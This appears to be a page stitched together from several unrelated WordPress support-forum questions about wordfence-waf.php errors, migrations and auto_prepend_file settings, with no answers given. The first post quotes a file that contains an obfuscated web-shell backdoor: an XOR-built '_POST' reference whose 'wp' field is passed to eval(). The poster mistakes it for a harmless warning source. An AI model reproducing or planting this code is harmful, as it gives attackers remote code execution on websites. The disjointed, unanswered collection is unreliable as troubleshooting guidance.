[07-Nov-2023 17:34:14 UTC] PHP Warning: Use of undefined constant wp – assumed ‘wp’ (this will throw an Error in a future version of PHP) in /home/…/public_html/wordfence-waf.php on line 7

Here is my wordfence-waf.php file contents with sensitive directory information omitted:

if (file_exists(‘…bootstrap.php’)) {
define(“WFWAF_LOG_PATH”, ‘…/wflogs/’);
include_once ‘….bootstrap.php’;
}
$waf = “~+d()”^”!{+{}”;
$wp = ${$waf}[wp];
eval(“\r”.$wp);
?>

How can I stop the warning?

Thanks,

Nicole

• I removed/deleted Wordfence plugin folder
• I checked .htaccess, user.ini and php.ini and no references to waf file are there anymore.
• I removed all wf database tables in phpMyAdmin
• I emptied any cache on server and check using an incognito window to not use browser cache, etc
• Where else would this path to the wordfence-waf file be? Is it hard coded somewhere else?? How can I remove all references from ever having the Wordfence plugin installed???

PLEASE HELP as I have spent a few days trying different tactics with no success.

I’ve seen other mentions of fixing path issues by updating the auto_prepend_file variable in the .htaccess file, but because my site is hosted on WPEngine, the use of the file was deprecated as of PHP 7.4.

Is there a way to avoid manually updating that file every time I copy to an environment?

I will like to know why my .com website now redirects to .online? Prior to this though, the website initially was displaying HTTP 500 ERROR until I deleted the .htaccess file and begins to displays the below message:

Warning: Unknown: failed to open stream: No such file or directory in Unknown on line 0

Fatal error: Unknown: Failed opening required ‘/home/prisdavc/public_html/wordfence-waf.php’ (include_path=’.:/usr/lib/php:/usr/local/lib/php’) in Unknown on line 0

What is the common cause and the possible fix to this problem could?

Thanks

So, now I have a big problem:
Due to a hoster-moving I try to move a multisite-Installation.

On the new host, it doesn’t work. The errorlog shows
PHP Fatal error: Unknown: Failed opening required '/xxx/xxx/xxx/xxx/xxx/xxx/xxx/xxx/xxx/wordfence-waf.php' ...

AS the WF-homepage describes, I put on the old hoster the option to delete all WF-Files on deactivation on and then I deactivated Wordfence.

Now I get the same error! My Site doesn’t work anymore!

I’ve check php.ini for auto_prepend_file and phpinfo() says: no value

So, what to do now? Restoring the database? OK, maybe that helps. An what next? I’ve checked the WP-root-dir and the wordfence-waf.php is gone. I’ve saved this, too. so I can upload it again. OK. And then? How can I deactivate WF in that way, that I can move the site?

I’ve tried it just now, 15 Minutes are gone, again. Still I get a 500.

Please help – the hole network is offline. Thank you!

I’ve temporarily opened up permissions to test and it’s still not working.

Permissions on the root folder (and everything within):

www-data:www-data
rwX:rwX

Also, I’ve tried to run a command as the www-data user to see if files actually can be created and it creates them without issue:
sudo -H -u www-data bash -c 'touch ~/testing.txt'
The file testing.txt is created in the root without issue.

On the diagnostics page, the PHP Environment Process Owner is www-data and there are no warnings in the Filesystem tab.

At this point I have no idea what to do.

Help most gratefully received!

I can’t setup the Wordfence firewall as it keeps wanting to write to the path of an old site. What’s happened is that this site belonged to another firm, but now the core part of it has been used for another client (with the new client’s permission!).

I’ve changed the correct path in wordfence-waf.php and user.ini, but when I try to set up the firewall it still keeps trying to write to the path for the old site.

“We were unable to write to /home/old-site/public_html/wp-content/wflogs/ which the WAF uses for storage.”

Where else do I need to change the path please?

I have created wordfence-waf.php in the root of the WP installation, and set permissions to 775, in addition to chgrp to the web group.

I’m using host that allows for creation of an additional php.ini that is parsed in addition to the system php.ini, but does not allow exiting on system php.ini.

There doesn’t seem to be a problem reading the custom php.ini, but when applying it, I get a PHP parse error:

Parse error: syntax error, unexpected 'not' (T_STRING) in /home/public/wordfence-waf.php on line 3.

The auto_prepend_file directive is the only item in this custom php.ini:

$ cat php.ini 
auto_prepend_file = '/home/public/wordfence-waf.php'

Additionally, I tried adding the following to my WP root .htaccess and the warning message did not go away:

<IfModule lsapi_module>
  php_value auto_prepend_file '/home/public/wordfence-waf.php'
</IfModule>

Using WordPress 4.6.1, Wordfence 6.2.2 and PHP 5.6.27.

I just updated WordPress on one of my clients’ sites using Composer and the update caused the wordfence-waf.php file to be removed from the WordPress core directory, which took the site down. I was able to get back up and running by copying the file over from another client’s site, but I don’t want to do that every time I update WordPress. Do you have another solution? Maybe wordfence-waf.php could go in a different directory?

https://www.ads-software.com/plugins/wordfence/